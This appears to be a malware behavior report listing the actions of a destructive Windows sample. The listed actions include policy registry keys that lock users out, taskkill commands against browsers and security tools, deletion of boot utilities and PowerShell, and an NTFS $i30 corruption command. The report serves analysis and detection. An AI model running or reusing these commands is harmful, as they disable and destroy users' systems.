Technical Information
- [<HKCU>\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\condrv\kernalconn...
- [\REGISTRY\USER\S-1-5-19\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\...
- [\REGISTRY\USER\S-1-5-20\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\...
- [\REGISTRY\USER\S-1-5-18\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\...
- hidden files
- file extensions
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
- Windows Defender
- User Account Control (UAC)
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- Hides taskbar notifications
- '%WINDIR%\syswow64\taskkill.exe' /f /im edge.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im mmc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im taskmgr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im processhacker.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im processexplorer.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im iexplore.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im chrome.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im powershell.exe
- iexplore.exe
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
- %WINDIR%\syswow64\temp\shutdowncounter.txt
- %WINDIR%\syswow64\temp\shutdowncounter.txt
- %WINDIR%\syswow64\windowspowershell\v1.0\certificate.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\examples\profile.ps1
- %WINDIR%\syswow64\windowspowershell\v1.0\wsman.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\types.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\registry.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\pwrshsip.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\pwrshmsg.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\pspluginwkr.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\psevents.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\modules\psdiagnostics\psdiagnostics.psd1
- %WINDIR%\syswow64\windowspowershell\v1.0\powershell_ise.exe
- %WINDIR%\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe
- %WINDIR%\syswow64\windowspowershell\v1.0\help.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\getevent.types.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\compiledcomposition.microsoft.powershell.gpowershell.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\modules\psdiagnostics\psdiagnostics.psm1
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q <SYSTEM32>\Temp
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\bootsect.exe /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\bootsect.exe /grant user:F
- '%WINDIR%\syswow64\cmd.exe' /c del /f /q <SYSTEM32>\bcdboot.exe
- '%WINDIR%\syswow64\cmd.exe' /c del /f /q <SYSTEM32>\bcdedit.exe
- '%WINDIR%\syswow64\cmd.exe' /c del /f /q <SYSTEM32>\bootsect.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im powershell.exe
- '%WINDIR%\syswow64\cmd.exe' /c takeown /F "%ProgramFiles%\WindowsPowerShell" /R /D Y
- '%WINDIR%\syswow64\takeown.exe' /F "%ProgramFiles%\WindowsPowerShell" /R /D Y
- '%WINDIR%\syswow64\cmd.exe' /c icacls "%ProgramFiles%\WindowsPowerShell" /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' "%ProgramFiles%\WindowsPowerShell" /grant user:F
- '%WINDIR%\syswow64\attrib.exe' +r +s +h <SYSTEM32>\Temp
- '%WINDIR%\syswow64\cmd.exe' /c del /s /f /q "%ProgramFiles%\WindowsPowerShell"
- '%WINDIR%\syswow64\cmd.exe' /c takeown /F "<SYSTEM32>\WindowsPowerShell\v1.0" /R /D Y
- '%WINDIR%\syswow64\takeown.exe' /F "<SYSTEM32>\WindowsPowerShell\v1.0" /R /D Y
- '%WINDIR%\syswow64\cmd.exe' /c icacls "<SYSTEM32>\WindowsPowerShell\v1.0" /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' "<SYSTEM32>\WindowsPowerShell\v1.0" /grant user:F
- '%WINDIR%\syswow64\cmd.exe' /c del /s /f /q "<SYSTEM32>\WindowsPowerShell\v1.0"
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q "<SYSTEM32>\WindowsPowerShell\v1.0"
- '%WINDIR%\syswow64\cmd.exe' /c assoc .vbs=
- '%WINDIR%\syswow64\cmd.exe' /c assoc .bat=
- '%WINDIR%\syswow64\cmd.exe' /c assoc .inf=
- '%WINDIR%\syswow64\cmd.exe' /c assoc .ps1=
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\bcdedit.exe /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\bcdedit.exe /grant user:F
- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\bcdboot.exe /grant user:F
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\bcdboot.exe /grant %Username%:F
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\bootsect.exe
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q C:\Users\Public\Desktop
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im edge.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im mmc.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im taskmgr.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im processhacker.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im processexplorer.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im iexplore.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im chrome.exe
- '%WINDIR%\syswow64\cmd.exe' /c cd C:\:$i30:$bitmap
- '%WINDIR%\syswow64\cmd.exe' /c del /s /f /q "%appdata%\Microsoft\Windows\Start Menu\Programs\*"
- '%WINDIR%\syswow64\cmd.exe' /c assoc .cmd=
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q "%ProgramFiles%\WindowsPowerShell"
- '%WINDIR%\syswow64\cmd.exe' /c attrib +r +s +h <SYSTEM32>\Temp
- '%WINDIR%\syswow64\attrib.exe' +r +s +h <SYSTEM32>\Temp\shutdowncounter.txt
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\Temp /R /D Y
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\Temp /R /D Y
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\Temp /deny Everyone:(DE,WO,AS,GW,WD,AD,WEA,DC,WA) /T /C /Q
